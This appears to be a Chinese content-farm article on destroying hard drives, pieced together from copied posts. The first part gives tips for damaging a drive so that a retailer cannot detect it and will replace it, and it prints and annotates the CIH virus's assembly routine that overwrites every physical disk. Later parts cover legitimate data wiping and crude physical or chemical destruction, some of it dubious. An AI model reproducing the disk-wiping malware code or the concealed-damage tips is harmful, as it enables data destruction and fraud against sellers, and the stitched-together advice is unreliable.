-
如何彻底破坏硬盘
- 时间:2024-11-13 09:10:41
大家好,今天Win10系统之家小编给大家分享「如何彻底破坏硬盘」的知识,如果能碰巧解决你现在面临的问题,记得收藏本站或分享给你的好友们哟~,现在开始吧!
1.如何能迅速破坏硬盘,详情如下:
复制来的。自己看把
具体几个办法
1 拿硬盘狂摇。。嘿嘿,几个钟头下来就差不多了
2找个垃圾电源,copy几个几G的文件包,在硬盘上不停的copy和del,不长时间也可以
3 用棉被包起来,狠摔。别叫看出来了(这个是以前伙计去换波导手机的办法)
4 找些DM之类的低格软件。使劲的弄,很快的
4 网上有一个牛人做的软件,它可以往硬盘的任意一簇上(注意他就是往一个点上)写数据,据说每秒钟达到近千万次。一块硬盘不到两分钟就能写出一个不可修复的坏道。多来几次的话。。。
5 把硬盘上下各夹一本厚点的书放平,用拳头狠狠的2拳就够了,这样你拿去商家用专业的软件都检测不过的,不然的话他给你把坏的隔离掉说没有什么问题
6 带电状态下,短路硬盘上的线路,绝对 OVER
有想换硬盘的可以试下,哈哈!
另附上CIH病毒破坏硬盘原理和方法..有兴趣找个CIH老病毒来玩是个很省事的方法.
CIH对硬盘破坏之完全剖析
IOS_SendCommand是Win95的一个非常底层的VXD调用,通常是用作对IO设备的低层
操作,如:读,写,加锁,格式化等等。一般情况下只能在Ring 0和虚拟机中使用,在普通
程序中使用会有不可预料的后果!该VXD调用的功能很多,也很繁杂。参数数量很少,只有
BCB或IOR和BDD或DCB的地址。但这几个数据结构却包含了大量的信息,结构也相当的复杂
。CIH病毒只用到了IOR结构,它包含了近二十个数据,但主要用到的就是IOR_func,IOR_s
tatus,IOR_flags,IOR_start_addr[2],IOR_xfer_count,IOR_buffer_ptr,IOR_req_re
q_handle,IOR_req_vol_handle,IOR_sgd_lin_phys,IOR_num_sgds,IOR_vol_designtr!
IOS_SendCommand的调用方法是:
mov esi, CmdData ; address of BCB or IOR
mov edi, DevData ; address of BDD or DCB
VxDCall IOS_SendCommand
IOR的完整定义为:
typedef struct _IOR {
ULONG IOR_next; // client link; see below
USHORT IOR_func; // function; see below
USHORT IOR_status; // request status; see below
ULONG IOR_flags; // request flags; see below
CMDCPLT IOR_callback; // address of callback; see below
ULONG IOR_start_addr[2]; // starting address; see below
ULONG IOR_xfer_count; // # of sectors/bytes; see below
ULONG IOR_buffer_ptr; // client buffer; see below
ULONG IOR_private_client; // BlockDev/IOS client reserved
ULONG IOR_private_IOS; // reserved space for IOS
ULONG IOR_private_port; // private area for port driver
union urequestor_usage _ureq; // requestor usage; see below
ULONG IOR_req_req_handle; // request handle; see below
ULONG IOR_req_vol_handle; // media handle; see below
ULONG IOR_sgd_lin_phys; // first physical SGD; see below
UCHAR IOR_num_sgds; // number of physical SGDs
UCHAR IOR_vol_designtr; // drive letter; see below
USHORT IOR_ios_private_1; // reserved by IOS to force alignment
ULONG IOR_reserved_2[2]; // reserved for internal use
} IOR, *PIOR;
CIH病毒先构造一个IOR,再使用IOS_SendCommand调用,完成IOR所指定的功能。
病毒在IOR中的IOR_flags中指示要写的设备为物理设备(IORF_PHYS_CMD),同步调用(IORF
_SYNC_COMMAND),即在写操作完成之后才返回。然后指定第一次写的位置为0(IOR_start_a
ddr[2]即0柱面0面0扇区,即主引导区),每次写入2048个字节(IOR_xfer_count),第一次
为物理硬盘一(IOR_vol_designtr=80h),需要写入的东西放在内存0c0001000h(IOR_buffe
r_ptr),这个地址是无所谓的,目的只是要随便写一大串无关数据到硬盘上,只要该地址不
是指向不存在的内存空间即可。最后CIH调用IOS_SendCommand,完成一次写操作!操作完
成后,先判断状态(IOR_status),看是否有该设备是否正常,是则每次2048字节的一直写
下去。如果写完一个硬盘(不太可能)或出错则把IOR_vol_designtr+1使之指向下一个物理
硬盘!
程序注释如下:
; ***************************
; * Kill All HardDisk *
; ***************************************************
; * IOR Structure of IOS_SendCommand Needs *
; ***************************************************
; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *
; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *
; ***************************************************
;0001为写功能IOR_WRITE
;40000501h为IOR_flags=1000000000000000000010100000001
;IORF_PHYS_CMD|IORF_VERSION_002|IORF_SYNC_COMMAND|IORF_HIGH_PRIORITY
;IORF_PHYS_CMD指示为物理设备
;IORF_SYNC_COMMAND指示为同步命令(操作完成后才返回)
;IORF_VERSION_002指示为扩展BCB(IOR)格式的IO请求
;IOR_start_addr[2]=00 00 00 00 00 00 00 00起始位置
(注意:不是扇区,而是字节)为0
;IOR_xfer_count=800h写入2048个字节
;IOR_buffer_ptr=0c0001000h要写的内容在地址0c0001000h
;IOR_vol_designtr=80h为第一个物理硬盘81h为第二个
KillHardDisk:
xor ebx, ebx
mov bh, FirstKillHardDiskNumber
push ebx
sub esp, 2ch
push 0c0001000h
mov bh, 08h
push ebx
push ecx
push ecx
push ecx
push 40000501h
inc ecx
push ecx
push ecx
mov esi, esp
sub esp, 0ach
;以压栈的形式构造IOR(就是上面那一大串数据)
LoopOfKillHardDisk:
int 20h
dd 00100004h ;调用 IOS_SendCommand
cmp word ptr [esi+06h], 0017h
;IOR_status=17h=IORS_NO_DEVICE设备正常
否?
je KillNextDataSection ;写下一块
ChangeNextHardDisk:
inc byte ptr [esi+4dh]
;下个硬盘,80h为第一个物理硬盘81h为第二个
jmp LoopOfKillHardDisk ;继续杀杀杀!!!!
KillNextDataSection:
add dword ptr [esi+10h], ebx
;下个区域(以800h为一块)
mov byte ptr [esi+4dh], FirstKillHardDiskNumber
;第一个物理硬盘80h
jmp LoopOfKillHardDisk ;继续杀杀杀!!!!
CIH病毒发作时,先破坏Flash Memory,随后就是硬盘。有些计算机在Flash Memo
ry被破坏后就完全当机了。那要恭喜你,你的硬盘不会有太大的损失。因为Flash Memory
中装有非常重要的程序和信息如BIOS,一旦破坏,机器完全死掉的可能性相当大。既然当
掉了,程序很可能执行不到杀硬盘的模块或执行一会儿便完全死机。你的硬盘就会有相当
大的可能恢复!但是,如果病毒程序运行顺利,正如上面程序所示的,它会每次2048个字
节的从主引导区开始写硬盘。直到分区引导区,主目录表,文件分配表,数据区......直
至写完整个硬盘。然后再开始杀第二个物理硬盘。是不是太黑了!这只是CIH病毒程序所预
计的理想情况,毕竟每次写2048个字节还是比较慢。普通一个上GB的硬盘,一个柱面有63
个扇区,要写完主引导区所在的0柱面0面的63个扇区也要花点时间!如果继续写下去,破
坏掉一些Win95正常运行所必须的一些文件数据,就很可能当机,这时,绝大都数人都会
Reset。这样的话,你就很有可能保存了相当部分地硬盘数据!这就是被CIH破坏了的硬盘
有可能用软件修复的真正原因!但千万不要以为那些软件的功能很强,足以修复所有硬盘
。硬盘的关键数据丢失太多的话,任何人都没有办法。所以修复概率很大程度上是依赖你
在病毒发作后关机的时间!时间越短,丢失的数据越少,修复的可能就越大!如果只有主
引导区被覆盖,那修复的可能有100%。如果分区引导区被覆盖,那修复的可能有99%。主
目录表被覆盖修复的可能有,但要手动恢复。如果文件分配表被覆盖,几乎不可能修复。
如果数据区被覆盖,那就彻底没有希望了!实际的情况还要复杂一些,通常是顺序的数据
丢失。
综上所述,CIH病毒对硬盘的破坏是逻辑的,是极据破坏性的!一旦破坏,修复的
可能性较小。一旦发作,要尽快的重起或关机,尽量减少损失!在奉劝各位一句,千万不要
在没有把握的情况下,把以上程序编译执行,那将导致非常严重的后果!其实要达到以上
2.如何彻底毁灭掉自己的硬盘,却看不出任何痕迹!
如果你的那个分区是5G,在你删除文件后,在那个分区放入一个4G以上的其他文件,在删除。这样,第一次的文件被覆盖,应该不能再恢复了。其实删除文件只是把分区表的那个“目录”删了,真正的文件没有删,而你删除文件后,放入了新的文件,就把原文件覆盖了。
通常我们都不希望数据被破坏,但有些时候,出于保护隐私的考虑,彻底地删除数据就显得非常重要了。比如要卖掉硬盘,或手提电脑而又不想泄露自己隐私或重要文件,这时就需要对硬盘来个彻底的洗脑了。
简单的删除操作和格式化是不能够完全删除硬盘上的数据的。这样删除的文件还可以通过各种数据恢复软件来恢复。虽然有很多文件粉碎机等小软件可以做到彻底删除文件,但要对付整个硬盘的数据就有点力不从心了。
这篇文章就推荐了一个名叫 Darik's Boot and Nuke的开源软件,可以完成全盘的数据清除工作。要使用这款软件先要制作启动盘,软盘、光盘和闪盘都可以。用制作出来的启动盘启动机器后就可以进行清理工作了。链接文章对操作步骤有详细的介绍,有需要就看看吧。
# 还有一种不可逆的彻底清除数据的方法就是低级格式化了。不过低格会对硬盘寿命有影响,除非有坏道,孤注一掷才会试试低格。
以下是我在网上找的光盘镜像,还有软盘和闪盘镜像,可以把它刻在光盘上或者放在启动软盘或者启动闪盘上,启动电脑之前把光盘放入光驱,或者软盘,闪盘连接到电脑上就可以了
3.怎样才能彻底销毁硬盘上面的数据?
美国电视剧《越狱》里有一个情节,迈克尔·斯科菲尔德将包含数据资料的硬盘扔到河里,想用这种方法销毁硬盘数据,最后,丢到河中的硬盘最终却被警察找到并恢复了数据,有数据取证专家表示,如果硬盘只是泡了水,数据恢复工作其实并不难,最终硬盘的数据被恢复了大部分。
可见,要想彻底毁掉一块硬盘上的数据,其实并不容易。
水可能会让硬盘的电子元件短路,但是数据并未丢失,不管盘片是湿的还是干的。来自闪回数据公司的副总裁Russell Chozick解释说:“只要盘片没有变干,取证专家就能够非常轻松地恢复数据,因为干了之后会留下一些难以清除的痕迹。”
而云存储公司Backblaze的首席执行官Gleb Budman补充说:先进的实验室完全可以读取不完整盘片上的数据,他们甚至不需要硬盘旋转就能做到,专家可以在盘片中恢复足够多的0和1来完成数据的读取。在某些情况下,要恢复盘片中的数据并非不可能,只不过那是一个漫长的过程,并且恢复成本非常昂贵。
那么怎么才能销毁硬盘的数据呢?
这里铅锤哥先介绍一下硬盘的工作原理:
硬盘中的数据以0和1的方式存储在铝块、陶瓷或者玻璃制作而成的盘片中,它看起来就像一张CD。盘片的中心是一个可以控制旋转的主轴,磁头利用电流来进行数据读取和写入工作,执行器和其他电子元件则负责控制整个操作过程。
要销毁硬盘数据,主要有以下三种思路:
第一种方法:物理销毁
原理:通过强力锤击,粉碎,爆炸,刮花硬盘表面等等破坏数据。
简介:第一种是比较简单暴力,但摧毁还不算彻底的方式。
具体实施:拆开硬盘后,用刀在磁片上划出一道道半径的直线,然后再将盘片用锤子砸粉碎,丢弃在不同地方。
第二种方法:化学销毁
原理:使用强化学剂溶解(比如各种酸)。
简介:第二种是比较彻底的方式,但是受限于化学反应的速度,比较慢。
具体实施:拆开硬盘后将硬盘泡水,并且注意尽量使用能腐蚀金属的脏水。
第三种方法:电磁特性改变
原理:强力通电或者磁场改变,加热烧灼,熔化。
简介:第三种最简单快速和彻底,只要电流磁场或者热量足够强,摧毁可以说是一瞬间的事。
具体实施:火烧法,拆开硬盘后火烧磁片,注意不要整个烧,拆散了均匀火烤。
以上就是关于「如何彻底破坏硬盘」的全部内容,本文讲解到这里啦,希望对大家有所帮助。如果你还想了解更多这方面的信息,记得收藏关注本站~
【此②文为Win10系统之家www.ghost580.net文♀章,转载请联系网站管理人员!】
相关文章
-
1.如何能迅速破坏硬盘,详情如下:复制来的。自己看把具体几个办法1拿硬盘狂摇。。嘿嘿,几个钟头下来就差不多了2找个垃圾电源,copy几个几G的文件包,在硬盘上不停的copy和del,不长时间也可以3用棉被包起来,狠摔。别叫看出...
-
1.如何直接用硬盘重装系统?如何重装系统一、制作启动盘(仅98/Me)单击“开始—设置—控制面板—添加删除程序—启动盘”,插入一张软盘,单击“创建启动盘”,ok了。如果你要在DOS环境下手动安装Win2000/XP/2003,把一个叫“SMARTDRV...
-
1.如何直接用硬盘重装系统?如何重装系统一、制作启动盘(仅98/Me)单击“开始—设置—控制面板—添加删除程序—启动盘”,插入一张软盘,单击“创建启动盘”,ok了。如果你要在DOS环境下手动安装Win2000/XP/2003,把一个叫“SMARTDRV...
-
1.win10专业版小娜怎么彻底禁用方法一:使用组策略禁用Cortana使用Windows10专业版或企业版的用户,可以使用使用组策略来完全禁用Cortana功能:1、使用Windows+R快捷键打开「运行」—执行gpedit.msc打开组策略编辑器。2、导...